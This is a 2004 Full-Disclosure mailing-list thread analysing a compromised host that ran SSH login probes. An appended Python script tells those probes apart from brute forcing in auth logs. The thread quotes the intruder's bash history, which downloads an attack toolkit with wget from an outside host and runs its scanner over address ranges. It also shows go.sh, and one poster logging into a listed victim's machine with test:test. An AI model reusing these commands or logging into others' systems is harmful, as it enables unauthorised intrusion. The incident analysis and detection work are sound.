What I find interesting is that the file vuln.txt contained a list of IP addresses that seem to have been exploited. I tried to login to one of them with user/pass test:test
[EMAIL PROTECTED] ssh $ ssh 161.53.223.3 -l test
Password:
Linux zagreb 2.4.26-grsec #1 SMP Thu Apr 15 17:27:27 CEST 2004 i686 GNU/Linux
Connection to 161.53.223.3 closed.

On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <[EMAIL PROTECTED]> wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
> Whoever broke into the machine did not take any attempts to cover up his
> tracks - this is what I found in /root/.bash_history:
>
> ------
> id
> uname -a
> w
> id
> ls
> wgte frauder.us/linux/ssh.tgz
> wget frauder.us/linux/ssh.tgz
> tar xzvf ssh.tgz
> tar xvf ssh.tgz
> ls
> cd ssh
> ls
> ../go.sh 195.178
> ls
> pico uniq.txt
> vi uniq.txt
> ls
> rm -rf uniq.txt
> ../go.sh 167.205
> ls
> rm -rf uniq.txt vuln.txt
> ../go.sh 202.148.20
> ../go.sh 212.92
> ../go.sh 195.197
> ../go.sh 147.32
> ../go.sh 213.168
> ../go.sh 134.176
> ../go.sh 195.83
> ------
>
> um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> binaries:
>
> go.sh:
> -------
> ../ss 22 -b $1 -i eth0 -s 6
> cat bios.txt |sort | uniq > uniq.txt
> ../sshf
> -------
>
> * 'ss' apparently is some sort of portscanner
> * 'sshf' connects to every IP in uniq.txt and tries to log in as user
>   'test' first, then as user 'guest' (according to tcpdump).
>
> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> As already mentioned, I am far from being an expert, but if I can assist
> in further testing, then let me know. Please CC me, I am not subscribed
> to the list.
>
> cheers,
> Stefan
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
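The quoted analysis describes a recognisable footprint on the receiving side: one login attempt as 'test', one as 'guest', from the same source within a second or two, with no repeated guessing. The script below is an added example for defenders reviewing their own sshd logs; it is not part of the thread and not the tool Stefan describes. It parses constructed OpenSSH auth-log lines (the hostname, IPs and timestamps are made up), groups attempts by source address, and separates the single-attempt test/guest probe pattern from ordinary multi-attempt brute forcing. It also reports any accepted login for a probed account, which is what would confirm the "vuln.txt" suspicion above. The 60-second window and the probe-user list are assumptions chosen for this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the original thread).
# 203.0.113.7 : test then guest, one try each           -> probe
# 203.0.113.9 : test accepted, guest tried once          -> probe, compromised
# 198.51.100.4: three tries for 'alice'                  -> brute force
# 192.0.2.20  : three tries for 'test'                   -> brute force, not the probe
SAMPLE_LOG = """\
Jul 29 18:38:15 zagreb sshd[2101]: Failed password for test from 203.0.113.7 port 40211 ssh2
Jul 29 18:38:16 zagreb sshd[2103]: Failed password for guest from 203.0.113.7 port 40213 ssh2
Jul 29 18:40:02 zagreb sshd[2110]: Accepted password for test from 203.0.113.9 port 40301 ssh2
Jul 29 18:40:03 zagreb sshd[2112]: Failed password for invalid user guest from 203.0.113.9 port 40303 ssh2
Jul 29 18:45:10 zagreb sshd[2130]: Failed password for alice from 198.51.100.4 port 51002 ssh2
Jul 29 18:45:12 zagreb sshd[2130]: Failed password for alice from 198.51.100.4 port 51002 ssh2
Jul 29 18:45:14 zagreb sshd[2130]: Failed password for alice from 198.51.100.4 port 51002 ssh2
Jul 29 18:50:00 zagreb sshd[2140]: Failed password for test from 192.0.2.20 port 33001 ssh2
Jul 29 18:50:01 zagreb sshd[2141]: Failed password for test from 192.0.2.20 port 33002 ssh2
Jul 29 18:50:02 zagreb sshd[2142]: Failed password for test from 192.0.2.20 port 33003 ssh2
"""

# Usernames the quoted post says the tool tries (assumption: list is complete).
PROBE_USERS = ("test", "guest")
# syslog lines carry no year; assumed year for the constructed sample.
ASSUMED_YEAR = 2004

# Matches both "Failed password for user ..." and "Failed password for invalid user user ...".
# Bare "Invalid user X from IP" lines are deliberately ignored because sshd also logs
# a "Failed password for invalid user X" line for the same attempt.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<event>Accepted|Failed) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def parse_auth_log(text):
    """Return a list of {ts, event, user, ip} dicts, one per password attempt."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['ts']} {ASSUMED_YEAR}", "%b %d %H:%M:%S %Y")
        events.append({"ts": ts, "event": m["event"], "user": m["user"], "ip": m["ip"]})
    return events


def analyze(events, window_seconds=60):
    """Classify each source IP as ssh_probe, brute_force or other.

    ssh_probe: every attempted username is in PROBE_USERS, each tried exactly
    once, all within window_seconds (the pattern described in the thread).
    brute_force: any username tried more than once.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        attempts = Counter(e["user"] for e in evs)
        users = list(dict.fromkeys(e["user"] for e in evs))  # first-seen order
        accepted = [e["user"] for e in evs if e["event"] == "Accepted"]
        span = (evs[-1]["ts"] - evs[0]["ts"]).total_seconds()
        if max(attempts.values()) > 1:
            pattern = "brute_force"
        elif all(u in PROBE_USERS for u in users) and span <= window_seconds:
            pattern = "ssh_probe"
        else:
            pattern = "other"
        findings[ip] = {
            "users": users,
            "pattern": pattern,
            "accepted": accepted,
            "span_seconds": span,
        }
    return findings


def compromised_sources(findings):
    """IPs that both fit the probe pattern and got an accepted login."""
    return sorted(ip for ip, f in findings.items()
                  if f["pattern"] == "ssh_probe" and f["accepted"])


if __name__ == "__main__":
    result = analyze(parse_auth_log(SAMPLE_LOG))
    for ip, f in sorted(result.items()):
        print(f"{ip:15} {f['pattern']:12} users={f['users']} accepted={f['accepted']}")
    print("probe + accepted login:", compromised_sources(result))
```

On a live host the same logic runs over /var/log/auth.log; an accepted login for 'test' or 'guest' after a single-try probe is the signal worth acting on first, since it means the account had a guessable password rather than that sshd was exploited.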